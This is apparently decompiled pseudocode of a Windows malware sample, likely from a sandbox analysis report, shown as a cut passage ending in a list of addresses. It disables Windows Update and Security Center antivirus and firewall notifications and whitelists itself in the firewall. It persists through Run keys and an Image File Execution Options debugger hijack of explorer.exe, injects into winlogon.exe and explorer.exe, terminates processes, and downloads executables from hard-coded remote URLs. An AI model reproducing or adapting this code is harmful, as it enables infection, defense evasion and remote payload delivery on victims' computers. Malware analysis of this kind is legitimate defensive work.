																													RtlAdjustPrivilege(0x13, 1, 0,  &(_t970[0xe]));
																													 *0x412240(1);
																												}
																											} else {
																												RegSetValueExA(_t970[0x16], "g00d d0gg", 0, 4, _t858, 4);
																											}
																										}
																										RegCloseKey(_t970[0x11]);
																									}
																									continue;
																								}
																								_t551 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t970[0x1c]), 0);
																								__eflags = _t551;
																								if(_t551 != 0) {
																									__eflags =  *_t970;
																									if( *_t970 == 0) {
																										goto L288;
																									}
																									L286:
																									_t970[0xc] = 0;
																									goto L288;
																								}
																								_t967 =  &(_t970[0x19]);
																								GetSystemTimeAsFileTime(_t967);
																								_t970[0x18] = 8;
																								_t937 =  &(_t970[0x17]);
																								_t553 = RegQueryValueExA(_t970[0x20], "ConnPred", 0,  &(_t970[0x17]), _t937,  &(_t970[0x18]));
																								__eflags = _t553;
																								if(_t553 != 0) {
																									L257:
																									__eflags = E004014D8(_t967, 0x412070) - 0x4af;
																									if(__eflags <= 0) {
																										L268:
																										__eflags =  *0x412080;
																										if( *0x412080 == 0) {
																											L271:
																											_t970[0x18] = 8;
																											__eflags = RegQueryValueExA(_t970[0x20], "UseExtProfile", 0,  &(_t970[0x17]), _t937,  &(_t970[0x18]));
																											if(__eflags != 0) {
																												L273:
																												_t558 = E00402427(__eflags);
																												__eflags = _t558;
																												if(_t558 != 0) {
																													L283:
																													RegCloseKey(_t970[0x1b]);
																													goto L284;
																												}
																												_push(1);
																												_push(0);
																												_t561 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																												__eflags = _t561;
																												if(_t561 == 0) {
																													L276:
																													_t970[0x18] = 8;
																													_t856 =  &(_t970[0x13]);
																													_t563 = RegQueryValueExA(_t970[0x20], "UseDflProfile", 0,  &(_t970[0x17]),  &(_t970[0x13]),  &(_t970[0x18]));
																													__eflags = _t563;
																													if(_t563 != 0) {
																														_t572 = _t970[0x16] + 0x1162f100;
																														__eflags = _t572;
																														asm("adc edx, 0xffffff9b");
																														_t970[0x12] = _t572;
																														_t970[0x13] = _t970[0x17];
																													}
																													__eflags = E004014D8( &(_t970[0x19]), _t856) - 0x152ab;
																													if(__eflags <= 0) {
																														goto L283;
																													} else {
																														_t566 = E00402427(__eflags);
																														__eflags = _t566;
																														if(_t566 != 0) {
																															goto L283;
																														}
																														_push(3);
																														_push(0);
																														_t568 = E0040211B("tombul.gif", 0);
																														__eflags = _t568;
																														if(_t568 == 0) {
																															goto L283;
																														}
																														_push(8);
																														_push(_t967);
																														_push(0xb);
																														_push(0);
																														_push("UseDflProfile");
																														L282:
																														RegSetValueExA(_t970[0x20], ??, ??, ??, ??, ??);
																														RegCloseKey(_t970[0x1b]);
																														 *_t970 = 1;
																														goto L286;
																													}
																												}
																												_t970[0x16] = _t970[0x19].dwLowDateTime;
																												_t970[0x17] = _t970[0x1a];
																												_push(8);
																												_push(_t967);
																												_push(0xb);
																												_push(0);
																												_push("UseExtProfile");
																												goto L282;
																											}
																											__eflags = E004014D8( &(_t970[0x19]),  &(_t970[0x16])) - 0x152ab;
																											if(__eflags <= 0) {
																												goto L276;
																											}
																											goto L273;
																										}
																										_push(3);
																										_push(0);
																										_t577 = E0040211B("grazie.gif", 0);
																										__eflags = _t577;
																										if(_t577 == 0) {
																											goto L271;
																										}
																										_t970[0x16] = _t970[0x19].dwLowDateTime;
																										_t970[0x17] = _t970[0x1a];
																										_push(8);
																										_push(_t967);
																										_push(0xb);
																										_push(0);
																										_push("ConnPred");
																										goto L282;
																									}
																									_t579 = E00402427(__eflags);
																									__eflags = _t579;
																									if(_t579 != 0) {
																										goto L283;
																									}
																									_t581 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																									_t946 = 0;
																									__eflags = _t581;
																									_t857 = _t581;
																									if(_t581 != 0) {
																										_t586 = E00401E00(_t581,  &(_t970[0x15]), 2);
																										__eflags = _t586 - 2;
																										if(_t586 == 2) {
																											_t946 = 1;
																										}
																									}
																									E00401F59(_t857);
																									__eflags = _t946;
																									if(_t946 == 0) {
																										 *0x412080 = 0;
																									} else {
																										 *0x412070 = _t970[0x19];
																										_t585 = 0;
																										__eflags = _t970[0x14] - 0x49;
																										 *0x412074 = _t970[0x1a];
																										if(_t970[0x14] == 0x49) {
																											__eflags = _t970[0x14] - 0x54;
																											if(_t970[0x14] == 0x54) {
																												_t585 = 1;
																											}
																										}
																										 *0x412080 = _t585;
																									}
																									goto L268;
																								}
																								_t588 = E004014D8(_t967, _t937);
																								__eflags = _t588 - 0x152ab;
																								if(_t588 <= 0x152ab) {
																									goto L271;
																								}
																								goto L257;
																								L287:
																								_t363 =  &(_t970[0xc]);
																								 *_t363 = _t970[0xc] + 1;
																								__eflags =  *_t363;
																								goto L288;
																							}
																						}
																						_t589 = "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU";
																						while(1) {
																							__eflags = _t589 - 0x407214;
																							if(_t589 >= 0x407214) {
																								break;
																							}
																							 *_t589 =  *_t589 ^ 0x000000d4;
																							_t589 =  &(_t589[1]);
																						}
																						_t590 = "NoAutoUpdate";
																						while(1) {
																							__eflags = _t590 - 0x4071cf;
																							if(_t590 >= 0x4071cf) {
																								break;
																							}
																							 *_t590 =  *_t590 ^ 0x000000d4;
																							_t590 =  &(_t590[1]);
																						}
																						_t948 =  &(_t970[0x26]);
																						_t591 = RegCreateKeyA(0x80000002, "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", _t948); // executed
																						__eflags = _t591;
																						if(_t591 == 0) {
																							RegSetValueExA(_t970[0x2b], "NoAutoUpdate", 0, 4,  &(_t970[0x28]), 4); // executed
																							RegCloseKey(_t970[0x26]);
																						}
																						_t592 = "SOFTWARE\\Microsoft\\Security Center";
																						while(1) {
																							__eflags = _t592 - 0x4071c2;
																							if(_t592 >= 0x4071c2) {
																								break;
																							}
																							 *_t592 =  *_t592 ^ 0x000000d4;
																							_t592 =  &(_t592[1]);
																						}
																						_t593 = "AntiVirusOverride";
																						while(1) {
																							__eflags = _t593 - 0x407188;
																							if(_t593 >= 0x407188) {
																								break;
																							}
																							 *_t593 =  *_t593 ^ 0x000000d4;
																							_t593 =  &(_t593[1]);
																						}
																						_t594 = "AntiVirusDisableNotify";
																						while(1) {
																							__eflags = _t594 - 0x407176;
																							if(_t594 >= 0x407176) {
																								break;
																							}
																							 *_t594 =  *_t594 ^ 0x000000d4;
																							_t594 =  &(_t594[1]);
																						}
																						_t595 = "FirewallDisableNotify";
																						while(1) {
																							__eflags = _t595 - 0x40715f;
																							if(_t595 >= 0x40715f) {
																								break;
																							}
																							 *_t595 =  *_t595 ^ 0x000000d4;
																							_t595 =  &(_t595[1]);
																						}
																						_t596 = "UpdatesDisableNotify";
																						while(1) {
																							__eflags = _t596 - 0x407149;
																							if(_t596 >= 0x407149) {
																								break;
																							}
																							 *_t596 =  *_t596 ^ 0x000000d4;
																							_t596 =  &(_t596[1]);
																						}
																						_t597 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006, _t948); // executed
																						__eflags = _t597;
																						if(_t597 == 0) {
																							_t861 =  &(_t970[0x28]);
																							RegSetValueExA(_t970[0x2b], "AntiVirusOverride", 0, 4, _t861, 4); // executed
																							RegSetValueExA(_t970[0x2b], "AntiVirusDisableNotify", 0, 4, _t861, 4); // executed
																							RegSetValueExA(_t970[0x2b], "FirewallDisableNotify", 0, 4, _t861, 4); // executed
																							RegSetValueExA(_t970[0x2b], "UpdatesDisableNotify", 0, 4, _t861, 4); // executed
																							RegCloseKey(_t970[0x26]); // executed
																						}
																						_t598 = "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
																						while(1) {
																							__eflags = _t598 - 0x407134;
																							if(_t598 >= 0x407134) {
																								break;
																							}
																							 *_t598 =  *_t598 ^ 0x000000d4;
																							_t598 =  &(_t598[1]);
																						}
																						_t599 = RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0x2001f, _t948); // executed
																						__eflags = _t599;
																						if(_t599 != 0) {
																							goto L248;
																						}
																						_t601 = E00401000(0x8000);
																						_t970[0x1d] = 0x4000;
																						_t949 = _t601;
																						_t602 = 0x407080;
																						_t970[0x27] = 0x4000;
																						while(1) {
																							__eflags = _t602 - 0x4070a4;
																							if(_t602 >= 0x4070a4) {
																								break;
																							}
																							 *_t602 =  *_t602 ^ 0x000000d4;
																							_t602 =  &(_t602[1]);
																						}
																						_t970[0xd] = 0;
																						while(1) {
																							_t310 =  &(_t949[0x4000]); // 0x4000
																							_t859 = _t310;
																							_t606 = RegEnumValueA(_t970[0x2d], _t970[0x13], _t949,  &(_t970[0x2b]), 0,  &(_t970[0x1e]), _t310,  &(_t970[0x1d]));
																							__eflags = _t606;
																							if(_t606 != 0) {
																								break;
																							}
																							__eflags = _t970[0x1c] - 1;
																							if(_t970[0x1c] == 1) {
																								_t608 = E00401311(_t859, 0x40708d);
																								__eflags = _t608;
																								if(_t608 != 0) {
																									RegDeleteValueA(_t970[0x27], _t949);
																								}
																							}
																							_t305 =  &(_t970[0xd]);
																							 *_t305 = _t970[0xd] + 1;
																							__eflags =  *_t305;
																							_t970[0x1d] = 0x4000;
																							_t970[0x27] = 0x4000;
																						}
																						_t860 =  &(_t970[0x55a]);
																						_t611 = wsprintfA(_t949, 0x407080, _t860) + 1;
																						__eflags = _t611;
																						_t970 =  &(_t970[3]);
																						RegSetValueExA(_t970[0x2b], _t860, 0, 1, _t949, _t611);
																						E00401029(_t949);
																						RegCloseKey(_t970[0x26]);
																						goto L248;
																					}
																					_t629 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t970[0x26]));
																					__eflags = _t629;
																					if(_t629 != 0) {
																						goto L208;
																					}
																					goto L205;
																				}
																				__eflags = _t474 - 0xffffffff;
																				if(_t474 == 0xffffffff) {
																					goto L197;
																				}
																				L196:
																				WriteFile(_t899, 0x408840, 0x5e00,  &(_t970[0x28]), 0); // executed
																				CloseHandle(_t970[0x28]); // executed
																				goto L198;
																			}
																			__eflags = _t471 - 0xffffffff;
																			if(_t471 != 0xffffffff) {
																				goto L196;
																			}
																			goto L194;
																		}
																		__eflags = _t637 + 1;
																		if(_t637 + 1 != 0) {
																			L177:
																			WriteFile(_t970[0x2c], 0x40e640, 0x1400,  &(_t970[0x28]), 0); // executed
																			__eflags = _t970[3];
																			if(_t970[3] != 0) {
																				SetFileTime(_t970[0x2b],  &(_t970[0x21]),  &(_t970[0x22]),  &(_t970[0x23])); // executed
																			}
																			CloseHandle(_t970[0x28]); // executed
																			_t970[9] = 1;
																			_push(0);
																			_push("winlogon.exe");
																			_t863 =  &(_t970[0x388]);
																			_t643 = E0040318D(_t863);
																			_t970 =  &(_t970[3]);
																			__eflags = _t643;
																			if(_t643 == 0) {
																				_push(0);
																				_push("explorer.exe");
																				E0040318D(_t863);
																				_t970 =  &(_t970[3]);
																			}
																			_push(0);
																			_push("kernel32.dll");
																			_push(_t863);
																			L191:
																			E0040318D();
																			_t970 =  &(_t970[3]);
																			CreateFileA( &(_t970[0x38c]), 0x80000000, 1, 0, 3, 0, 0); // executed
																			goto L192;
																		}
																		goto L189;
																	}
																	__eflags = _t463 + 1;
																	if(_t463 + 1 != 0) {
																		goto L177;
																	}
																	goto L186;
																}
																L183:
																_t970[9] = 1;
																_push(0);
																_push("kernel32.dll");
																_push( &(_t970[0x388]));
																goto L191;
															}
															__eflags = _t459 + 1;
															if(_t459 + 1 == 0) {
																goto L182;
															}
															goto L177;
														} else {
															_t950 =  &(_t970[0x16a]);
															_t651 = GetTempFileNameA(_t844, "tmp", 0, _t950);
															__eflags = _t651;
															if(_t651 == 0) {
																goto L175;
															}
															_t652 = CreateFileA(_t950, 0x40000000, 0, 0, 2, 0x80, 0);
															_t970[0x28] = _t652;
															__eflags = _t652;
															if(_t652 == 0) {
																goto L175;
															}
															__eflags = _t652 + 1;
															if(_t652 + 1 == 0) {
																goto L175;
															}
															L172:
															WriteFile(_t970[0x2c], _t970[8], _t966,  &(_t970[0x28]), 0); // executed
															CloseHandle(_t970[0x28]);
															CreateFileA( &(_t970[0x170]), 0x80000000, 1, 0, 3, 0, 0); // executed
															_t951 =  &(_t970[0x1ee]);
															_t923 =  &(_t970[0x162]);
															_t893 =  &(_t970[0x278]);
															while(1) {
																__eflags = _t951 - _t893;
																if(_t951 >= _t893) {
																	goto L175;
																}
																_t660 = _t970[0x1ee] & 0x000000ff ^  *_t923;
																_t923 =  &(_t923[0]);
																 *_t951 = _t660;
																_t951 =  &(_t951[1]);
															}
															goto L175;
														}
													}
													_t952 =  &(_t970[0x16a]);
													_push(_t952);
													_push(0);
													_push(0x411040);
													_push(_t843);
													L00405E90();
													__eflags = _t453;
													if(_t453 == 0) {
														goto L167;
													}
													_push(0);
													_push(0x80);
													_push(2);
													_push(0);
													_push(0);
													_push(0x40000000);
													_push(_t952);
													L00405DB0();
													_t970[0x28] = _t453;
													__eflags = _t453;
													if(_t453 == 0) {
														goto L167;
													}
													__eflags = _t453 + 1;
													if(_t453 + 1 != 0) {
														goto L172;
													}
													goto L167;
												}
												RegDeleteValueA(_t446, "SubshellState");
												RegCloseKey(_t970[0x26]);
												_t953 =  &(_t970[0x1ee]);
												_t924 =  &(_t970[0x162]);
												_t894 =  &(_t970[0x278]);
												while(1) {
													__eflags = _t953 - _t894;
													if(_t953 >= _t894) {
														break;
													}
													_t687 = _t970[0x1ee] & 0x000000ff ^  *_t953;
													_t953 =  &(_t953[0]);
													 *_t924 = _t687;
													_t924 =  &(_t924[1]);
												}
												_push( *0x4120b0);
												_t666 =  &(_t970[0x163]);
												_push(_t666);
												L00405E50();
												__eflags = _t666;
												if(_t666 != 0) {
													L142:
													_t864 =  &(_t970[0x16b]);
													SetFileAttributesA(_t864, 0x80);
													DeleteFileA(_t864);
													goto L156;
												}
												_push( &(_t970[0x55a]));
												_t670 =  &(_t970[0x1ac]);
												_push(_t670);
												L00405E50();
												__eflags = _t670;
												if(_t670 == 0) {
													_t672 = CreateFileA( &(_t970[0x170]), 0x80000000, 1, 0, 3, 0, 0);
													_t970[0x28] = _t672;
													__eflags = _t672;
													if(_t672 == 0) {
														goto L142;
													}
													__eflags = _t672 - 0xffffffff;
													if(_t672 == 0xffffffff) {
														goto L142;
													}
													_t673 = GetFileSize(_t672, 0);
													_t970[0x1d] = _t673;
													__eflags = _t673 - _t966;
													if(_t673 == _t966) {
														_t676 = E00401000(_t966);
														_t954 = _t676;
														ReadFile(_t970[0x2c], _t676, _t966,  &(_t970[0x28]), 0);
														_t865 = _t970[0x1d];
														_t925 = _t954;
														_t938 = _t970[5];
														__eflags = _t954 - _t954 + _t865;
														while(__eflags < 0) {
															_t895 =  *_t925 & 0x000000ff;
															__eflags = _t970[0x162] - ( *_t938 & 0x000000ff);
															if(__eflags == 0) {
																__eflags = _t895;
															}
															if(__eflags == 0) {
																_t925 =  &(_t925[1]);
																_t938 =  &(_t938[1]);
																__eflags = _t925 - _t954 + _t865;
																continue;
															} else {
																E00401029(_t954);
																goto L146;
															}
														}
														E00401029(_t954);
														goto L175;
													}
													L146:
													CloseHandle(_t970[0x28]);
												}
												goto L142;
											}
											_t866 =  &(_t970[0x3cb]);
											_t688 = GetSystemDirectoryA(_t866, 0x104);
											_push( *0x412090);
											_push(0x41103e);
											_push(_t866);
											L00405E30();
											_push(_t688);
											L00405E30();
											_t689 = "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}";
											while(1) {
												__eflags = _t689 - 0x407286;
												if(_t689 >= 0x407286) {
													break;
												}
												 *_t689 =  *_t689 ^ 0x000000d4;
												_t689 =  &(_t689[1]);
											}
											_t690 = CreateMutexA(0, 0, "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}"); // executed
											_t970[0x28] = _t690;
											__eflags = _t690;
											if(_t690 == 0) {
												Sleep(0x7d0);
											} else {
												WaitForSingleObject(_t690, 0x2710);
												CloseHandle(_t970[0x28]);
											}
											_t867 =  &(_t970[0x3cb]);
											SetFileAttributesA(_t867, 0x80); // executed
											_t692 = CreateFileA(_t867, 0x40000000, 0, 0, 2, 0x80, 0); // executed
											_t970[0x28] = _t692;
											__eflags = _t692;
											if(_t692 == 0) {
												L135:
												RegCloseKey(_t970[0x26]); // executed
												RegDeleteKeyA(0x80000001,  &(_t970[0x40e])); // executed
												goto L136;
											} else {
												__eflags = _t692 - 0xffffffff;
												if(_t692 == 0xffffffff) {
													goto L135;
												}
												WriteFile(_t692, 0x4072a0, 0x800,  &(_t970[0x28]), 0); // executed
												_t697 = E004010B2();
												_t970[6] = _t697;
												__eflags = _t697;
												if(_t697 == 0) {
													_t970[6] = 0xc6;
												}
												_t699 = E00401000(_t966 + 0x64);
												 *((char*)(_t699 + _t966)) = 0;
												_t939 = _t699;
												_t955 = _t699;
												_t927 = _t970[5];
												_t700 = _t699 + _t966;
												while(1) {
													__eflags = _t955 - _t700;
													if(_t955 >= _t700) {
														break;
													}
													_t725 = _t970[6] & 0x000000ff ^  *_t927;
													_t927 =  &(_t927[0]);
													 *_t955 = _t725;
													_t955 = _t955 + 1;
													_t700 = _t939 + _t966;
												}
												_t701 =  &(_t970[0x55a]);
												_t868 = _t939 + _t966;
												_push(_t701);
												L00405E40();
												_t956 = _t868 +  &(_t701[1]);
												__eflags = _t956 - _t868 + 0x64;
												while(__eflags < 0) {
													 *_t956 = E004010B2();
													_t956 = _t956 + 1;
													_t179 = _t966 + 0x64; // 0x64
													__eflags = _t956 - _t939 + _t179;
												}
												 *(_t939 + _t966 + 1) = _t966;
												_t870 = _t939 + _t966;
												_push( &(_t970[0x55a]));
												_t957 = _t870;
												_push( &(_t870[1]));
												L00405E20();
												_t704 =  &(_t870[0x19]);
												while(1) {
													__eflags = _t957 - _t704;
													if(_t957 >= _t704) {
														break;
													}
													 *_t957 =  *_t957 ^ _t970[6] & 0x000000ff;
													_t957 =  &(_t957[0]);
													_t188 = _t966 + 0x64; // 0x64
													_t704 = _t939 + _t188;
												}
												WriteFile(_t970[0x2c], _t939, _t966 + 0x64,  &(_t970[0x28]), 0); // executed
												E00401029(_t939);
												__eflags = _t970[3];
												if(_t970[3] != 0) {
													SetFileTime(_t970[0x2b],  &(_t970[0x21]),  &(_t970[0x22]),  &(_t970[0x23])); // executed
												}
												CloseHandle(_t970[0x28]); // executed
												_t871 =  &(_t970[0x3d0]);
												CreateFileA(_t871, 0x80000000, 1, 0, 3, 0, "true"); // executed
												E00401251(_t970[0x26]);
												_t970[0x27] = 1;
												_t714 = RegSetValueExA(_t970[0x2b], "IsInstalled", 0, 4,  &(_t970[0x28]), 4); // executed
												_push(_t871);
												L00405E40();
												_t715 = _t714 + 1;
												__eflags = _t715;
												RegSetValueExA(_t970[0x2b], "StubPath", 0, 1, _t871, _t715); // executed
												_t970[0xa] = 1;
												goto L135;
											}
										}
										__eflags =  *((char*)(_t969 + 0x1e8));
										if( *((char*)(_t969 + 0x1e8)) != 0) {
											_push(_t841);
											_t728 = _t969 + 0x1bc;
											_push(_t728);
											L00405E20();
											while(1) {
												_t872 = _t969 + 0x1b8;
												_push(_t872);
												L00405E40();
												__eflags = _t728 - 0xf;
												if(_t728 > 0xf) {
													goto L105;
												}
												_t728 = _t969 + 0x1e8;
												_push(_t728);
												_push(_t872);
												L00405E30();
											}
											goto L105;
										}
										goto L101;
									}
									_t730 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t969 + 0x98); // executed
									__eflags = _t730;
									if(_t730 != 0) {
										goto L99;
									}
									_t873 = _t969 + 0x123c;
									_t731 = GetSystemDirectoryA(_t873, 0x104);
									_push( *0x4120a0);
									_push(0x41103e);
									_push(_t873);
									L00405E30();
									_push(_t731);
									L00405E30();
									_t732 = "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}";
									while(1) {
										__eflags = _t732 - 0x407b06;
										if(_t732 >= 0x407b06) {
											break;
										}
										 *_t732 =  *_t732 ^ 0x000000d4;
										_t732 =  &(_t732[1]);
									}
									_t733 = CreateMutexA(0, 0, "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}"); // executed
									 *(_t969 + 0xa0) = _t733;
									__eflags = _t733;
									if(_t733 == 0) {
										Sleep(0x7d0);
									} else {
										WaitForSingleObject(_t733, 0x2710);
										CloseHandle( *(_t969 + 0xa0)); // executed
									}
									_t874 = _t969 + 0x123c;
									SetFileAttributesA(_t874, 0x80); // executed
									_t735 = CreateFileA(_t874, 0x40000000, 0, 0, 2, 0x80, 0); // executed
									 *(_t969 + 0xa0) = _t735;
									__eflags = _t735;
									if(_t735 == 0) {
										L98:
										RegCloseKey( *(_t969 + 0x98)); // executed
										goto L99;
									} else {
										__eflags = _t735 - 0xffffffff;
										if(_t735 == 0xffffffff) {
											goto L98;
										}
										WriteFile(_t735, 0x407b20, 0xc00, _t969 + 0xa0, 0); // executed
										_t738 = E004010B2();
										 *(_t969 + 0x1b) = _t738;
										__eflags = _t738;
										if(_t738 == 0) {
											 *(_t969 + 0x1b) = 0x66;
										}
										_t740 = E00401000(_t966 + 0x64);
										 *((char*)(_t740 + _t966)) = 0;
										_t940 = _t740;
										_t958 = _t740;
										_t930 =  *(_t969 + 0x14);
										_t741 = _t740 + _t966;
										while(1) {
											__eflags = _t958 - _t741;
											if(_t958 >= _t741) {
												break;
											}
											_t765 =  *(_t969 + 0x1b) & 0x000000ff ^  *_t930;
											_t930 =  &(_t930[0]);
											 *_t958 = _t765;
											_t958 = _t958 + 1;
											_t741 = _t940 + _t966;
										}
										_t742 = _t969 + 0x1568;
										_t875 = _t940 + _t966;
										_push(_t742);
										L00405E40();
										_t959 = _t875 + _t742 + 5;
										__eflags = _t959 - _t875 + 0x64;
										while(__eflags < 0) {
											 *_t959 = E004010B2();
											_t959 = _t959 + 1;
											_t107 = _t966 + 0x64; // 0x64
											__eflags = _t959 - _t940 + _t107;
										}
										 *(_t940 + _t966 + 1) = _t966;
										_t877 = _t940 + _t966;
										_push(_t969 + 0x1568);
										_t960 = _t877;
										_push( &(_t877[1]));
										L00405E20();
										_t745 =  &(_t877[0x19]);
										while(1) {
											__eflags = _t960 - _t745;
											if(_t960 >= _t745) {
												break;
											}
											 *_t960 =  *_t960 ^  *(_t969 + 0x1b) & 0x000000ff;
											_t960 =  &(_t960[0]);
											_t116 = _t966 + 0x64; // 0x64
											_t745 = _t940 + _t116;
										}
										WriteFile( *(_t969 + 0xb0), _t940, _t966 + 0x64, _t969 + 0xa0, 0); // executed
										E00401029(_t940);
										__eflags =  *(_t969 + 0xc);
										if( *(_t969 + 0xc) != 0) {
											SetFileTime( *(_t969 + 0xac), _t969 + 0x84, _t969 + 0x88, _t969 + 0x8c); // executed
										}
										CloseHandle( *(_t969 + 0xa0));
										_t878 = _t969 + 0x1250;
										CreateFileA(_t878, 0x80000000, 1, 0, 3, 0, 0); // executed
										RegDeleteValueA( *(_t969 + 0x9c), "Debugger"); // executed
										_t754 = E00401251( *(_t969 + 0x98));
										_push(_t878);
										L00405E40();
										_t755 = _t754 + 1;
										__eflags = _t755;
										RegSetValueExA( *(_t969 + 0xac), "Debugger", 0, 1, _t878, _t755); // executed
										 *(_t969 + 0x2c) = 1;
										goto L98;
									}
								}
								__eflags = _t414 - 0xffffffff;
								if(_t414 == 0xffffffff) {
									goto L66;
								}
								_t966 = GetFileSize(_t414, 0);
								 *(_t969 + 0x14) = E00401000(_t768);
								ReadFile( *(_t969 + 0xb0),  *(_t969 + 0x20), _t966, _t969 + 0xa0, 0); // executed
								CloseHandle( *(_t969 + 0xa0));
								goto L67;
							} else {
								_t880 = _t969 + 0x145c;
								_t778 = GetSystemDirectoryA(_t880, 0x100);
								_push( *0x4120b0);
								_push(0x41103e);
								_push(_t880);
								L00405E30();
								L00405E30();
								_t961 = _t969 + 0x1568;
								_t780 = E004010F7(_t969 + 0x1568, _t880, _t778);
								__eflags = _t780;
								if(_t780 != 0) {
									L51:
									__eflags =  *(_t969 + 0x20);
									if( *(_t969 + 0x20) != 0) {
										_t793 = CreateFileA(_t969 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
										__eflags = _t793;
										_t883 = _t793;
										if(_t793 != 0) {
											__eflags = _t793 - 0xffffffff;
											if(_t793 != 0xffffffff) {
												SetFilePointer(_t793, 0xfffffff0, 0, 2);
												WriteFile(_t883, 0x4120e0, 4, _t969 + 0xa0, 0);
												CloseHandle(_t883);
											}
										}
									}
									__eflags =  *(_t969 + 0xc);
									if( *(_t969 + 0xc) != 0) {
										_t786 = CreateFileA(_t969 + 0x1470, 0x80000100, 1, 0, 3, 0, 0);
										__eflags = _t786;
										_t882 = _t786;
										if(_t786 != 0) {
											__eflags = _t786 - 0xffffffff;
											if(_t786 != 0xffffffff) {
												SetFileTime(_t882, _t969 + 0x84, _t969 + 0x88, _t969 + 0x8c);
												CloseHandle(_t882);
											}
										}
									}
									_t962 = _t969 + 0x145c;
									SetFileAttributesA(_t962, 0x21);
									CloseHandle( *(_t969 + 0x10));
									_t881 = _t969 + 0xb28;
									GetStartupInfoA(_t881);
									_push(_t969 + 0xb18);
									_push(_t881);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(_t962);
									CreateProcessA();
									L61:
									ExitProcess(0);
									L62:
									 *0x412000 = 1;
									goto L63;
								}
								_push(0x104);
								_push(_t880);
								_push( *0x4120b0);
								_push("%CommonProgramFiles%\\System\\");
								_t941 = _t969 + 0x1358;
								L00405E20();
								L00405E30();
								_t798 = ExpandEnvironmentStringsA(_t780, _t780, _t941);
								__eflags = _t798;
								if(_t798 == 0) {
									L49:
									_push(0x104);
									_push(_t880);
									_push( *0x4120b0);
									_push("%AppData%\\");
									L00405E20();
									L00405E30();
									_t799 = ExpandEnvironmentStringsA(_t798, _t798, _t941);
									__eflags = _t799;
									if(_t799 == 0) {
										goto L62;
									}
									_t801 = E004010F7(_t961, _t880);
									__eflags = _t801;
									if(_t801 == 0) {
										goto L62;
									}
									goto L51;
								}
								_t798 = E004010F7(_t961, _t880);
								__eflags = _t798;
								if(_t798 != 0) {
									goto L51;
								}
								goto L49;
							}
						}
						_t823 = E004030DE(_t969 + 0x1f8);
						 *(_t969 + 4) = _t823;
						if(_t823 == 0) {
							L8:
							_t824 = GetCurrentProcessId();
							 *(_t969 + 0x428) = 0x128;
							_t884 = _t824;
							_t942 = 0;
							__eflags = 0;
							_t826 = Process32First(_t968, _t969 + 0x428);
							while(1) {
								__eflags = _t826;
								if(_t826 == 0) {
									break;
								}
								__eflags =  *(_t969 + 0x430) - _t884;
								if( *(_t969 + 0x430) == _t884) {
									L15:
									_t826 = Process32Next(_t968, _t969 + 0x428);
									continue;
								}
								_push( *0x4120b0);
								_t836 = E004010DC(_t969 + 0x450);
								_push(_t836);
								_t964 = _t836;
								L00405E50();
								__eflags = _t836;
								if(_t836 == 0) {
									L13:
									_t837 = OpenProcess(0x100201, 0,  *(_t969 + 0x430));
									 *(_t969 + 0x558 + _t942 * 4) = _t837;
									__eflags = _t837;
									if(_t837 == 0) {
										goto L15;
									}
									_t942 = _t942 + 1;
									__eflags = _t942 - 9;
									if(_t942 > 9) {
										break;
									}
									goto L15;
								}
								_push("winrnt.exe");
								_push(_t964);
								L00405E50();
								__eflags = _t836;
								if(_t836 != 0) {
									goto L15;
								}
								goto L13;
							}
							_t885 = 0;
							__eflags = 0;
							CloseHandle(_t968);
							goto L17;
							L21:
							__eflags = _t886 - _t942;
							if(_t886 < _t942) {
								_t886 = _t886 + 1;
								TerminateProcess( *(_t969 + 0x55c + _t886 * 4), 0);
								goto L21;
							}
							_t963 = _t963 - 1;
							__eflags = _t963;
							if(_t963 >= 0) {
								L20:
								_t886 = 0;
								__eflags = 0;
								goto L21;
							} else {
								_t887 = 0;
								__eflags = 0;
								goto L25;
								L25:
								__eflags = _t887 - _t942;
								if(_t887 >= _t942) {
									__eflags =  *(_t969 + 4);
									if( *(_t969 + 4) != 0) {
										_t888 = _t969 + 0x21e;
										SetFileAttributesA(_t888, 0x80);
										DeleteFileA(_t888);
									}
									goto L29;
								} else {
									WaitForSingleObject( *(_t969 + 0x55c + _t887 * 4), 0x1388);
									_t887 = _t887 + 1;
									CloseHandle( *(_t969 + 0x558 + _t887 * 4));
									goto L25;
								}
							}
							L17:
							__eflags = _t885 - _t942;
							if(_t885 >= _t942) {
								_t963 = 4;
								goto L20;
							} else {
								_t885 = _t885 + 1;
								SetPriorityClass( *(_t969 + 0x55c + _t885 * 4), 0x40);
								goto L17;
							}
						} else {
							RegDeleteValueA(_t823, "SubshellState");
							RegCloseKey( *(_t969 + 4));
							_t965 = _t969 + 0x21a;
							_t936 = _t969 + 0x31e;
							L6:
							if(_t965 < _t936) {
								 *_t965 =  *_t965 ^  *(_t969 + 0x1f8) & 0x000000ff;
								_t965 =  &(_t965[0]);
								goto L6;
							}
							goto L8;
						}
					}
				}
			}

0x00000000
0x00403ff5
0x00403ff5
0x00403ffa
0x0040425a
0x0040425f
0x00000000
0x00000000
0x00404267
0x00000000
0x00404000
0x00404000
0x00404004
0x0040400b
0x0040400d
0x0040416b
0x0040416b
0x00404170
0x0040418f
0x00404194
0x00404196
0x0040419c
0x004041c8
0x004041cd
0x004041cf
0x004041d1
0x004041f9
0x004041fe
0x00404200
0x00404219
0x0040421e
